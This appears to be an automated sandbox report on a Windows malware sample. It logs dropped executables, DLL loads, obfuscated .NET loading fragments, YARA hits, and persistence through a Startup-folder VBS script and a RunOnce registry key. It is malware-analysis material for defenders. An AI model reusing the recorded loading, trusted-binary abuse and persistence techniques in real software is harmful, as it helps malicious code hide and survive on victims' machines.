                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: feclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: advpack.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb0#x source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbZ source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: eulUtil.pdbl source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: wextract.pdb source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: ((.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbpv source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdbc source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3360530165.00000000052F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000C37000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdb} source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb' source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBp& source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbps source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.cs.Net Code: Type.GetTypeFromHandle(QJNfCFtP437ujS306F5.hiY14dNiNh(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(QJNfCFtP437ujS306F5.hiY14dNiNh(16777252)),Type.GetTypeFromHandle(QJNfCFtP437ujS306F5.hiY14dNiNh(16777284))})
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, eEMbGORUaTTyJOqnkhL.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: seniorcommunicate.exe.0.dr, ReaderDatabaseFilter.cs.Net Code: FindTokenizer System.Reflection.Assembly.Load(byte[])
                  Source: cvchost.exe.1.dr, ReaderDatabaseFilter.cs.Net Code: FindTokenizer System.Reflection.Assembly.Load(byte[])
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 1.2.seniorcommunicate.exe.6ee0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, rjm77BLgSlS4gfsq4b.cs.Net Code: JvjkJaQCYv0LSdAlKTW System.AppDomain.Load(byte[])
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 1.2.seniorcommunicate.exe.4bd7ba8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: Yara matchFile source: 1.2.seniorcommunicate.exe.6fb0000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.seniorcommunicate.exe.4a9df48.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2539050952.0000000006FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: seniorcommunicate.exe PID: 6752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3796, type: MEMORYSTR
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF71D1D1D28
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0793616F push ebp; iretd 1_2_07936170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B426D5 push cs; retf 6_2_00B426DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F350F pushad ; retf 6_2_051F3510
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F3177 push cs; iretd 6_2_051F317A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F3D6F push ss; ret 6_2_051F3D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F081A push BFFFFFF8h; retf 0000h6_2_051F0824
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F07C6 push edx; retf 6_2_051F07D4
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, jy2mWCZnI5vwjv8QrFU.csHigh entropy of concatenated method names: 'OmZZOneVVd', 'nK6Z9j48bC', 'ePsZ46K7mT', 'UsSZYNpIAH', 'TO7Zeu420t', 'mV4ZUCrCAf', 'GuTZuLqtZ5', 'aywZ0fvYxx', 'JFPZklxUBM', 'IhJZ73P67O'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'gbPy6AgqfFLsPNioGdC'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, q6VvtRGP7t4wqeILix1.csHigh entropy of concatenated method names: 'TmEGD92LuW', 'diOGHlM7y6', 'hJqGwmSTIQ', 'oyMGdBYKKp', 'X4RGIK7NhV', 'w5ayf7dL6HTZcRRWKnb', 'jnHfnNdYWmpjK0gqJLT', 'UMIN3lde6ZxoX0JVG15', 'OtRVDNdUG7OJu6bP5ec', 'R74fEcduYp2LAQQg2a6'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, FDsVfXVeHoYlGhgf0FK.csHigh entropy of concatenated method names: 'hlCVuYBguG', 'uboV01jsDq', 'vC1nqQTwcre5f9aoCSC', 't7n7hOTdlBwGUy9twMW', 'VJIjkoTIajx0ZOLTgNW', 'bIYth1TT3O1ggxZnpe9', 'umn8L1Tg4crah4YhEO0', 'legFRjTmXrGhRgQ8NlB', 'wXrHULTvnqboyFdNYOc', 'bA5rYMTpYWS0XDyhr09'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, SE8nFDtdDofHflqtUYD.csHigh entropy of concatenated method names: 'lWptsYiAcm', 'TOktSBGxPG', 'Vo5tfxc1El', 'DEFtFSfPSA', 'RnRt8cOCUL', 'OXQtW9AVKB', 'UDAtXCwA0V', 'IFgtBO6GHc', 'wWdtC52Hyh', 'XwxtbTQ21d'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, QJNfCFtP437ujS306F5.csHigh entropy of concatenated method names: 'hiY14dNiNh', 'rTS1LsftI5', 'T7wyahmLtIWhbxxQ4JM', 'MkmbMamYQDTCehhaLot', 'FYniXWmeFEQW71U4hlh', 'v253lhmUI4Yxcsa6bEp', 'g837BbmuPn9ukT6Afd1', 'Hnt2Dym0BIEZU5TJqtV'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, mGJBCYtzHu6W7XgA2oQ.csHigh entropy of concatenated method names: 'YByUr9LA4s', 'f6GUNDHeQU', 'GKCURcVXNH', 'jOAU62wmaq', 'fKMUKambQH', 'stUUQqPCDq', 'bByUEVTQUF', 'fuv9jjWqas', 'WL5U3ElJIs', 'SufUPfaNBd'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.csHigh entropy of concatenated method names: 'yUWAHhgAHkHV2l6NGoF', 'T9FJuDg5couh1kMSaKb', 'clYttBsqAd', 'H66yUXgsWsDI71Z8FZN', 'elLqZegScOhYW2vS2qs', 'wII13wgfjutPtwYcdfv', 'MO5kLpgFGqh0oIlAEA4', 'YF4Evrg8o462YBEphWm', 'XdofJjgWaLZFZYvCBXx', 'XldlCSgXDjPmVQSZPi0'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, rjm77BLgSlS4gfsq4b.csHigh entropy of concatenated method names: 'crJq5byk6', 'dPLTJhQAY', 'wAbXx6Jm9', 'nJWbElMuk', 'Yq5ASBhXe', 'SHtOMM9H0', 'drF0wlVL2', 'gCdIqsfevJbWougkCJ5', 'XwITJ5fP65HI6IdsrVV', 'CipxiwfzNhb6ZWEkV48'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, N9fDDdoBjLZYFXgP1np.csHigh entropy of concatenated method names: 'qnQozf540E', 'wa9fCEBTBJ', 'Rs4fGfxmc1', 'eC2fRgRtbP', 'IHffnv7H6b', 'TXifo9HfTi', 'U5lfftRQxo', 'kO3fQ8n8wg', 'X9EfEBKi8e', 'rjqf7eFeri'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, lVPThIaqfiNX7UqKFF.csHigh entropy of concatenated method names: 'NcSRFn0JjC', 'ur5Ricsuf1', 'EBVyvW7SZmZ0WniwjyU', 'pvQYnx7tfocMs5ZxhhC', 'mKkJt07Yfc9kjM1Ho6o', 'Fqal8u73ZeNjSAA44uM', 'KZGodp7hm6aITlwJRYN', 'aLOR1RpLrA', 'uf0Rd6EtyF', 'InvKTe7k8eKEisGgJf0'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, eEMbGORUaTTyJOqnkhL.csHigh entropy of concatenated method names: 'lOQx8Ec8phekNreOQyO', 'Ck3ibLcMBcOWabwqWf2', 'q8GouYikdw', 'nxNKBScsFwawOjU5inF', 'u876amcITsUM8oLJaTn', 'GWLQGlc2nOaVC5PZE7u', 'xyy4wMcxNjWx3LBsKkl', 'HgyE2Ececk9tuoKoj4Y', 'KuTRc3cPZntP8rorkkB', 'R1SKcRczJSdUIE3w0j8'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, Eu8dK5ihrKEXZHH1sc.csHigh entropy of concatenated method names: 'eNkuQQyFu', 'lsl1MlhOM', 'rJJdYke5v', 'PMX5UL5Pi', 'S1KtQ9Q6MaUWOTTTGv5', 'VUGm0qQkDTvXjTMPiGE', 'R1mGFdQgMbV3ItawtnN', 'xtp9eIQvYFCpw78WYOI', 'CmWnD7QNjJhYqW79aLK', 'BCWmIaQ9ndUEIS45UKS'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, ful7MIR8qft3Twvnwvq.csHigh entropy of concatenated method names: 'BSXwGZLLAA', 'XfHVqIcggxKn1JZBEk6', 'H7a4AAc9SLqVcqtLcVI', 'XoU4K3crqI0Fmu2gv4j', 'AtV1EccmekmXljUHME6', 'WhY5QacpIAe3oHrjV5b', 'nEy4pJc6UaMoB6LtqOC', 'ACTlIKck68mWSHK0EHg', 'D09U1ecDMdmPGihYxxe', 'QhUTVAcWKPcTZPBionr'
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Local\cvchost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF71D1D1684

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
